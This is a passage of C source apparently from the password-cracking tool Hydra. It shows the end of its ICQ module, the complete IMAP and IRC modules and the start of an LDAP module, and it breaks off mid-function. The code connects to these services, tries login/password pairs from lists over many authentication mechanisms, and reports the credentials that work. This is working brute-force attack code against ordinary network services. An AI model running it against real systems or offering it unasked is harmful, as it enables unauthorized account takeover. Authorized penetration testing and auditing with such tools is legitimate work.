unsigned long uin = strtoul(login, NULL, 10);
char buf[64];
buf[0] = 0x02;
buf[1] = 0x00;
buf[2] = 0x0a;
buf[3] = 0x0;
buf[4] = seq & 0xff;
buf[5] = (seq >> 8) & 0xff;
buf[6] = uin & 0xff;
buf[7] = (uin >> 8) & 0xff;
buf[8] = (uin >> 16) & 0xff;
buf[9] = (uin >> 24) & 0xff;
return (hydra_send(s, buf, 10, 0));
}
int start_icq(int sock, char *ip, int port, FILE * output, char *miscptr, FILE * fp) {
unsigned char buf[1024];
char *login, *pass;
char *empty = "";
int i, r;
if (strlen(login = hydra_get_next_login()) == 0)
return 2;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
for (i = 0; login[i]; i++)
if (!isdigit((int) login[i])) {
fprintf(stderr, "[ERROR] Invalid UIN %s\n, ignoring.", login);
hydra_completed_pair();
return 2;
}
icq_login(sock, login, pass);
while (1) {
if ((r = hydra_recv(sock, (char *) buf, sizeof(buf))) == 0) {
return 1;
}
if (r < 0) {
if (verbose)
fprintf(stderr, "[ERROR] Process %d: Can not connect [unreachable]\n", (int) getpid());
return 3;
}
if (buf[2] == 0x5a && buf[3] == 0x00) {
hydra_report_found_host(port, ip, "icq", output);
hydra_completed_pair_found();
icq_ack(sock, login);
icq_login_1(sock, login);
hydra_recv(sock, (char *) buf, sizeof(buf));
icq_ack(sock, login);
hydra_recv(sock, (char *) buf, sizeof(buf));
icq_ack(sock, login);
icq_disconnect(sock, login);
break;
} else if ((buf[2] != 10 && buf[2] != 250) || buf[3] != 0) {
hydra_completed_pair();
break;
}
/* if((buf[2] != 10 || buf[3] != 0) && (buf[2] != 250 || buf[3] != 0)) */
}
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_icq(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_ICQ;
if (port)
myport = port;
port = myport;
if ((options & OPTION_SSL) != 0 && child_head_no == 0) {
fprintf(stderr, "[ERROR] You can not use SSL with ICQ!\n");
hydra_child_exit(0);
}
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1:
if (sock >= 0)
sock = hydra_disconnect(sock);
sock = hydra_connect_udp(ip, myport);
if (sock < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
case 2:
next_run = start_icq(sock, ip, port, fp, miscptr, fp);
break;
case 3:
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
int service_icq_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

576
hydra-imap.c Normal file
View file

@ -0,0 +1,576 @@
#include "hydra-mod.h"
#include "sasl.h"
extern char *HYDRA_EXIT;
char *buf;
int counter;
int imap_auth_mechanism = AUTH_CLEAR;
char *imap_read_server_capacity(int sock) {
char *ptr = NULL;
int resp = 0;
char *buf = NULL;
do {
if (buf != NULL)
free(buf);
ptr = buf = hydra_receive_line(sock);
if (buf != NULL) {
if (strstr(buf, "CAPABILITY") != NULL && buf[0] == '*') {
resp = 1;
usleep(300000);
/* we got the capability info then get the completed warning info from server */
while (hydra_data_ready(sock)) {
free(buf);
buf = hydra_receive_line(sock);
}
} else {
if (buf[strlen(buf) - 1] == '\n')
buf[strlen(buf) - 1] = 0;
if (buf[strlen(buf) - 1] == '\r')
buf[strlen(buf) - 1] = 0;
if (isdigit((int) *ptr) && *(ptr + 1) == ' ') {
resp = 1;
}
}
}
} while (buf != NULL && resp == 0);
return buf;
}
int start_imap(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[500], buffer2[500];
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
while (hydra_data_ready(s)) {
if ((buf = hydra_receive_line(s)) == NULL)
return (1);
free(buf);
}
switch (imap_auth_mechanism) {
case AUTH_LOGIN:
sprintf(buffer, "%d AUTHENTICATE LOGIN\r\n", counter);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL) {
hydra_report(stderr, "[ERROR] IMAP LOGIN AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
strcpy(buffer2, login);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%.250s\r\n", buffer2);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL) {
hydra_report(stderr, "[ERROR] IMAP LOGIN AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
strcpy(buffer2, pass);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%.250s\r\n", buffer2);
break;
case AUTH_PLAIN:
sprintf(buffer, "%d AUTHENTICATE PLAIN\r\n", counter);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL) {
hydra_report(stderr, "[ERROR] IMAP PLAIN AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
memset(buffer, 0, sizeof(buffer));
sasl_plain(buffer, login, pass);
sprintf(buffer, "%.250s\r\n", buffer);
break;
#ifdef LIBOPENSSL
case AUTH_CRAMMD5:
case AUTH_CRAMSHA1:
case AUTH_CRAMSHA256:{
int rc = 0;
char *preplogin;
rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin);
if (rc) {
return 3;
}
switch (imap_auth_mechanism) {
case AUTH_CRAMMD5:
sprintf(buffer, "%d AUTHENTICATE CRAM-MD5\r\n", counter);
break;
case AUTH_CRAMSHA1:
sprintf(buffer, "%d AUTHENTICATE CRAM-SHA1\r\n", counter);
break;
case AUTH_CRAMSHA256:
sprintf(buffer, "%d AUTHENTICATE CRAM-SHA256\r\n", counter);
break;
}
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
//get the one-time BASE64 encoded challenge
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL || strstr(buf, "BYE") != NULL) {
switch (imap_auth_mechanism) {
case AUTH_CRAMMD5:
hydra_report(stderr, "[ERROR] IMAP CRAM-MD5 AUTH : %s\n", buf);
break;
case AUTH_CRAMSHA1:
hydra_report(stderr, "[ERROR] IMAP CRAM-SHA1 AUTH : %s\n", buf);
break;
case AUTH_CRAMSHA256:
hydra_report(stderr, "[ERROR] IMAP CRAM-SHA256 AUTH : %s\n", buf);
break;
}
free(buf);
return 3;
}
memset(buffer, 0, sizeof(buffer));
from64tobits((char *) buffer, buf + 2);
free(buf);
memset(buffer2, 0, sizeof(buffer2));
switch (imap_auth_mechanism) {
case AUTH_CRAMMD5:{
sasl_cram_md5(buffer2, pass, buffer);
sprintf(buffer, "%s %.250s", preplogin, buffer2);
}
break;
case AUTH_CRAMSHA1:{
sasl_cram_sha1(buffer2, pass, buffer);
sprintf(buffer, "%s %.250s", preplogin, buffer2);
}
break;
case AUTH_CRAMSHA256:{
sasl_cram_sha256(buffer2, pass, buffer);
sprintf(buffer, "%s %.250s", preplogin, buffer2);
}
break;
}
hydra_tobase64((unsigned char *) buffer, strlen(buffer), sizeof(buffer));
sprintf(buffer, "%.250s\r\n", buffer);
free(preplogin);
}
break;
case AUTH_DIGESTMD5:{
sprintf(buffer, "%d AUTHENTICATE DIGEST-MD5\r\n", counter);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL || strstr(buf, "BYE") != NULL) {
hydra_report(stderr, "[ERROR] IMAP DIGEST-MD5 AUTH : %s\n", buf);
free(buf);
return 3;
}
memset(buffer, 0, sizeof(buffer));
from64tobits((char *) buffer, buf);
free(buf);
if (verbose)
hydra_report(stderr, "DEBUG S: %s\n", buffer);
sasl_digest_md5(buffer2, login, pass, buffer, miscptr, "imap", NULL, 0, NULL);
if (buffer2 == NULL)
return 3;
if (verbose)
hydra_report(stderr, "DEBUG C: %s\n", buffer2);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%s\r\n", buffer2);
}
break;
case AUTH_SCRAMSHA1:{
char clientfirstmessagebare[200];
char serverfirstmessage[200];
char *preplogin;
int rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin);
if (rc) {
return 3;
}
sprintf(buffer, "%d AUTHENTICATE SCRAM-SHA-1\r\n", counter);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL || strstr(buf, "BYE") != NULL) {
hydra_report(stderr, "[ERROR] IMAP SCRAM-SHA1 AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
snprintf(clientfirstmessagebare, sizeof(clientfirstmessagebare), "n=%s,r=hydra", preplogin);
free(preplogin);
memset(buffer2, 0, sizeof(buffer2));
sprintf(buffer2, "n,,%.200s", clientfirstmessagebare);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
snprintf(buffer, sizeof(buffer), "%s\r\n", buffer2);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
buf = hydra_receive_line(s);
if (buf == NULL)
return 1;
if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL || strstr(buf, "BYE") != NULL) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Not a valid server challenge\n");
free(buf);
return 1;
} else {
/* recover server challenge */
memset(buffer, 0, sizeof(buffer));
//+ cj1oeWRyYU9VNVZqcHQ5RjNqcmVXRVFWTCxzPWhGbTNnRGw0akdidzJVVHosaT00MDk2
from64tobits((char *) buffer, buf + 2);
free(buf);
strncpy(serverfirstmessage, buffer, sizeof(serverfirstmessage) - 1);
serverfirstmessage[sizeof(serverfirstmessage) - 1] = '\0';
memset(buffer2, 0, sizeof(buffer2));
sasl_scram_sha1(buffer2, pass, clientfirstmessagebare, serverfirstmessage);
if (buffer2 == NULL) {
hydra_report(stderr, "[ERROR] Can't compute client response\n");
return 1;
}
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%s\r\n", buffer2);
}
}
break;
#endif
case AUTH_NTLM:{
unsigned char buf1[4096];
unsigned char buf2[4096];
//Send auth request
sprintf(buffer, "%d AUTHENTICATE NTLM\r\n", counter);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL || strstr(buf, "BYE") != NULL) {
hydra_report(stderr, "[ERROR] IMAP NTLM AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
//send auth and receive challenge
//send auth request: lst the server send it's own hostname and domainname
buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2));
sprintf(buffer, "%s\r\n", buf1);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
if ((buf = hydra_receive_line(s)) == NULL)
return (1);
//recover challenge
from64tobits((char *) buf1, buf + 2);
free(buf);
//Send response
buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2));
sprintf(buffer, "%s\r\n", buf1);
}
break;
default:
//clear authentication
sprintf(buffer, "%d LOGIN \"%.100s\" \"%.100s\"\r\n", counter, login, pass);
}
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return (1);
if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL || strstr(buf, "BYE") != NULL) {
if (verbose)
hydra_report(stderr, "[ERROR] %s\n", buf);
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
if (counter == 4)
return 1;
return (2);
}
free(buf);
hydra_report_found_host(port, ip, "imap", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_imap(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_IMAP, mysslport = PORT_IMAP_SSL, disable_tls = 1;
char *buffer1 = "1 CAPABILITY\r\n";
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
buf = hydra_receive_line(sock);
if ((buf == NULL) || (strstr(buf, "OK") == NULL && buf[0] != '*')) { /* check the first line */
if (verbose || debug)
hydra_report(stderr, "[ERROR] Not an IMAP protocol or service shutdown:\n");
if (buf != NULL)
free(buf);
hydra_child_exit(2);
}
free(buf);
/* send capability request */
if (hydra_send(sock, buffer1, strlen(buffer1), 0) < 0)
exit(-1);
counter = 2;
buf = imap_read_server_capacity(sock);
if (buf == NULL) {
hydra_child_exit(2);
}
if ((miscptr != NULL) && (strlen(miscptr) > 0)) {
int i;
for (i = 0; i < strlen(miscptr); i++)
miscptr[i] = (char) toupper((int) miscptr[i]);
if (strstr(miscptr, "TLS") || strstr(miscptr, "SSL")) {
disable_tls = 0;
}
}
#ifdef LIBOPENSSL
if (!disable_tls) {
/* check for STARTTLS, if available we may have access to more basic auth methods */
if (strstr(buf, "STARTTLS") != NULL) {
hydra_send(sock, "2 STARTTLS\r\n", strlen("2 STARTTLS\r\n"), 0);
counter++;
free(buf);
buf = hydra_receive_line(sock);
if (buf == NULL || (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL)) {
hydra_report(stderr, "[ERROR] TLS negotiation failed, no answer received from STARTTLS request\n");
} else {
free(buf);
if ((hydra_connect_to_ssl(sock) == -1)) {
if (verbose)
hydra_report(stderr, "[ERROR] Can't use TLS\n");
disable_tls = 1;
run = 1;
break;
} else {
if (verbose)
hydra_report(stderr, "[VERBOSE] TLS connection done\n");
}
/* ask again capability request but in TLS mode */
if (hydra_send(sock, "3 CAPABILITY\r\n", strlen("3 CAPABILITY\r\n"), 0) < 0)
hydra_child_exit(2);
buf = imap_read_server_capacity(sock);
counter++;
if (buf == NULL)
hydra_child_exit(2);
}
} else
hydra_report(stderr, "[ERROR] option to use TLS/SSL failed as it is not supported by the server\n");
}
#endif
if (verbose)
hydra_report(stderr, "[VERBOSE] CAPABILITY: %s", buf);
//authentication should be listed AUTH= like in the extract below
//STARTTLS LOGINDISABLED AUTH=GSSAPI AUTH=DIGEST-MD5 AUTH=CRAM-MD5
if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=NTLM") != NULL)) {
imap_auth_mechanism = AUTH_NTLM;
}
#ifdef LIBOPENSSL
if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=SCRAM-SHA-1") != NULL)) {
imap_auth_mechanism = AUTH_SCRAMSHA1;
}
if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=DIGEST-MD5") != NULL)) {
imap_auth_mechanism = AUTH_DIGESTMD5;
}
if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=CRAM-SHA256") != NULL)) {
imap_auth_mechanism = AUTH_CRAMSHA256;
}
if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=CRAM-SHA1") != NULL)) {
imap_auth_mechanism = AUTH_CRAMSHA1;
}
if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=CRAM-MD5") != NULL)) {
imap_auth_mechanism = AUTH_CRAMMD5;
}
#endif
if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=PLAIN") != NULL)) {
imap_auth_mechanism = AUTH_PLAIN;
}
if (strstr(buf, "=LOGIN") != NULL) {
imap_auth_mechanism = AUTH_LOGIN;
}
free(buf);
if ((miscptr != NULL) && (strlen(miscptr) > 0)) {
if (strstr(miscptr, "CLEAR"))
imap_auth_mechanism = AUTH_CLEAR;
if (strstr(miscptr, "LOGIN"))
imap_auth_mechanism = AUTH_LOGIN;
if (strstr(miscptr, "PLAIN"))
imap_auth_mechanism = AUTH_PLAIN;
#ifdef LIBOPENSSL
if (strstr(miscptr, "CRAM-MD5"))
imap_auth_mechanism = AUTH_CRAMMD5;
if (strstr(miscptr, "CRAM-SHA1"))
imap_auth_mechanism = AUTH_CRAMSHA1;
if (strstr(miscptr, "CRAM-SHA256"))
imap_auth_mechanism = AUTH_CRAMSHA256;
if (strstr(miscptr, "DIGEST-MD5"))
imap_auth_mechanism = AUTH_DIGESTMD5;
if (strstr(miscptr, "SCRAM-SHA1"))
imap_auth_mechanism = AUTH_SCRAMSHA1;
#endif
if (strstr(miscptr, "NTLM"))
imap_auth_mechanism = AUTH_NTLM;
}
if (verbose) {
switch (imap_auth_mechanism) {
case AUTH_CLEAR:
hydra_report(stderr, "[VERBOSE] using IMAP CLEAR LOGIN mechanism\n");
break;
case AUTH_LOGIN:
hydra_report(stderr, "[VERBOSE] using IMAP LOGIN AUTH mechanism\n");
break;
case AUTH_PLAIN:
hydra_report(stderr, "[VERBOSE] using IMAP PLAIN AUTH mechanism\n");
break;
#ifdef LIBOPENSSL
case AUTH_CRAMMD5:
hydra_report(stderr, "[VERBOSE] using IMAP CRAM-MD5 AUTH mechanism\n");
break;
case AUTH_CRAMSHA1:
hydra_report(stderr, "[VERBOSE] using IMAP CRAM-SHA1 AUTH mechanism\n");
break;
case AUTH_CRAMSHA256:
hydra_report(stderr, "[VERBOSE] using IMAP CRAM-SHA256 AUTH mechanism\n");
break;
case AUTH_DIGESTMD5:
hydra_report(stderr, "[VERBOSE] using IMAP DIGEST-MD5 AUTH mechanism\n");
break;
case AUTH_SCRAMSHA1:
hydra_report(stderr, "[VERBOSE] using IMAP SCRAM-SHA1 AUTH mechanism\n");
break;
#endif
case AUTH_NTLM:
hydra_report(stderr, "[VERBOSE] using IMAP NTLM AUTH mechanism\n");
break;
}
}
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_imap(sock, ip, port, options, miscptr, fp);
counter++;
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
int service_imap_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

218
hydra-irc.c Normal file
View file

@ -0,0 +1,218 @@
#include "hydra-mod.h"
/*
RFC 1459: Internet Relay Chat Protocol
*/
extern char *HYDRA_EXIT;
char *buf;
char buffer[300] = "";
int myport = PORT_IRC, mysslport = PORT_IRC_SSL;
int start_oper_irc(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass;
int ret;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
sprintf(buffer, "OPER %s %s\r\n", login, pass);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 3;
}
ret = hydra_recv(s, buffer, sizeof(buffer));
/* :irc.debian.org 381 koma :You are now an IRC Operator */
/* :irc.debian.org 464 koma :Invalid password */
if ((ret > 0) && (strstr(buffer, " 381 ") != NULL)) {
hydra_report_found_host(port, ip, "irc", fp);
hydra_completed_pair_found();
} else {
hydra_completed_pair();
}
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
int send_nick(int s, char *ip, char *pass) {
if (strlen(pass) > 0) {
sprintf(buffer, "PASS %s\r\n", pass);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return -1;
}
}
sprintf(buffer, "CAP LS\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return -1;
}
sprintf(buffer, "NICK hydra%d\r\nUSER hydra%d hydra %s :hydra\r\n", (int) getpid(), (int) getpid(), hydra_address2string(ip));
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return -1;
}
return 0;
}
int irc_server_connect(char *ip, int sock, int port, unsigned char options) {
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
return sock;
}
int start_pass_irc(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *pass;
int ret;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
s = irc_server_connect(ip, s, port, options);
if (s < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
return 3;
}
if (send_nick(s, ip, pass) < 0) {
return 3;
}
ret = hydra_recv(s, buffer, sizeof(buffer));
#ifdef HAVE_PCRE
if ((ret > 0) && (!hydra_string_match(buffer, "ERROR\\s.*password"))) {
#else
if ((ret > 0) && (strstr(buffer, "ERROR") == NULL)) {
#endif
hydra_report_pass_found(port, ip, "irc", fp);
hydra_completed_pair_found();
hydra_report(stderr, "[INFO] Server password '%s' is working, you can pass it as argument\nto irc module to then try login/password oper mode\n", pass);
} else {
if (verbose && (miscptr != NULL))
hydra_report(stderr, "[VERBOSE] Server is requesting a general password, '%s' you entered is not working\n", miscptr);
hydra_completed_pair();
}
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 4;
}
void service_irc(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1, ret;
char *buf;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
next_run = 0;
switch (run) {
case 1: /* connect and service init function */
sock = irc_server_connect(ip, sock, port, options);
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
if (miscptr == NULL) {
miscptr = "";
}
if (send_nick(sock, ip, miscptr) < 0) {
hydra_child_exit(1);
}
ret = hydra_recv(sock, buffer, sizeof(buffer));
/* ERROR :Bad password */
#ifdef HAVE_PCRE
if ((ret > 0) && (hydra_string_match(buffer, "ERROR\\s.*password"))) {
#else
if ((ret > 0) && (strstr(buffer, "ERROR") != NULL)) {
#endif
if (verbose)
hydra_report(stderr, "[INFO] Server is requesting a password, will try to find it\n");
if (sock >= 0)
sock = hydra_disconnect(sock);
next_run = 4;
break;
}
while (hydra_data_ready(sock)) {
buf = hydra_receive_line(sock);
free(buf);
}
if ((ret > 0) && (strstr(buffer, " 432 ") != NULL)) {
/* :irc.debian.org 432 * hydra_5075 :Erroneous nickname */
if (verbose)
hydra_report(stderr, "[ERROR] Erroneous nickname\n");
hydra_child_exit(0);
}
if ((ret > 0) && (strstr(buffer, " 433 ") != NULL)) {
/* :irc.debian.org 433 * hydra :Nickname already in use */
if (verbose)
hydra_report(stderr, "[ERROR] Nickname already in use\n");
hydra_child_exit(0);
}
/* ERROR :Bad password is returned from ngircd when it s waiting for a server password */
if ((ret > 0) && (strstr(buffer, " 001 ") == NULL)) {
/* seems we not successfully connected */
hydra_report(stderr, "[ERROR] should not be able to identify server msg, please report it\n%s\n", buffer);
hydra_child_exit(0);
}
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_oper_irc(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
case 4:
next_run = start_pass_irc(sock, ip, port, options, miscptr, fp);
break;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
int service_irc_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

452
hydra-ldap.c Normal file
View file

@ -0,0 +1,452 @@
#include "hydra-mod.h"
#include "sasl.h"
extern char *HYDRA_EXIT;
unsigned char *buf;
int counter;
int tls_required = 0;
int start_ldap(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp, char version, int auth_method) {
char *empty = "";
char *login = "", *pass;
unsigned char buffer[512];
int length = 0;
int ldap_auth_mechanism = auth_method;
/*
The LDAP "simple" method has three modes of operation:
* anonymous= no user no pass
* unauthenticated= user but no pass
* user/password authenticated= user and pass
*/
if ((miscptr != NULL) && (ldap_auth_mechanism == AUTH_CLEAR)) {
login = miscptr;
} else {
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
}
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
switch (ldap_auth_mechanism) {
case AUTH_CLEAR:
length = 14 + strlen(login) + strlen(pass);
break;
#ifdef LIBOPENSSL
case AUTH_CRAMMD5:
length = 14 + strlen(miscptr) + strlen("CRAM-MD5") + 2;
break;
case AUTH_DIGESTMD5:
length = 14 + strlen(miscptr) + strlen("DIGEST-MD5") + 2;
break;
#endif
}
memset(buffer, 0, sizeof(buffer));
buffer[0] = 48;
buffer[1] = length - 2;
buffer[2] = 2;
buffer[3] = 1;
buffer[4] = counter % 256;
buffer[5] = 96;
buffer[6] = length - 7;
buffer[7] = 2;
buffer[8] = 1;
buffer[9] = version;
buffer[10] = 4;
if (ldap_auth_mechanism == AUTH_CLEAR) {
buffer[11] = strlen(login); /* DN */
memcpy(&buffer[12], login, strlen(login));
buffer[12 + strlen(login)] = (unsigned char) 128;
buffer[13 + strlen(login)] = strlen(pass);
memcpy(&buffer[14 + strlen(login)], pass, strlen(pass)); /* PASS */
} else {
char *authm = "DIGEST-MD5";
if (ldap_auth_mechanism == AUTH_CRAMMD5) {
authm = "CRAM-MD5";
}
if ((strlen(miscptr)) > sizeof(buffer) - 16 - strlen(authm)) {
miscptr[sizeof(buffer) - 16 - strlen(authm)] = '\0';
}
buffer[11] = strlen(miscptr); /* DN */
memcpy(&buffer[12], miscptr, strlen(miscptr));
buffer[12 + strlen(miscptr)] = 163;
buffer[13 + strlen(miscptr)] = 2 + strlen(authm);
buffer[14 + strlen(miscptr)] = 4;
buffer[15 + strlen(miscptr)] = strlen(authm);
memcpy(&buffer[16 + strlen(miscptr)], authm, strlen(authm));
}
if (hydra_send(s, (char *) buffer, length, 0) < 0)
return 1;
if ((buf = (unsigned char *) hydra_receive_line(s)) == NULL)
return 1;
if (buf[0] != 0 && buf[0] != 32 && buf[9] == 2) {
if (verbose)
hydra_report(stderr, "[VERBOSE] Protocol invalid\n");
free(buf);
return 3;
}
if (buf[0] != 0 && buf[0] != 32 && buf[9] == 13) {
if (verbose)
hydra_report(stderr, "[VERBOSE] Confidentiality required, TLS has to be enabled\n");
tls_required = 1;
free(buf);
return 1;
}
if ((buf[0] != 0 && buf[0] != 32) && buf[9] == 34) {
hydra_report(stderr, "[ERROR] Invalid DN Syntax\n");
hydra_child_exit(2);
free(buf);
return 3;
}
#ifdef LIBOPENSSL
/* one more step auth for CRAM and DIGEST */
if (ldap_auth_mechanism == AUTH_CRAMMD5) {
/* get the challenge, need to extract it */
char *ptr;
char buf2[32];
ptr = strstr((char *) buf, "<");
sasl_cram_md5(buf2, pass, ptr);
if (buf2 == NULL)
return 1;
counter++;
if (strstr(miscptr, "^USER^") != NULL) {
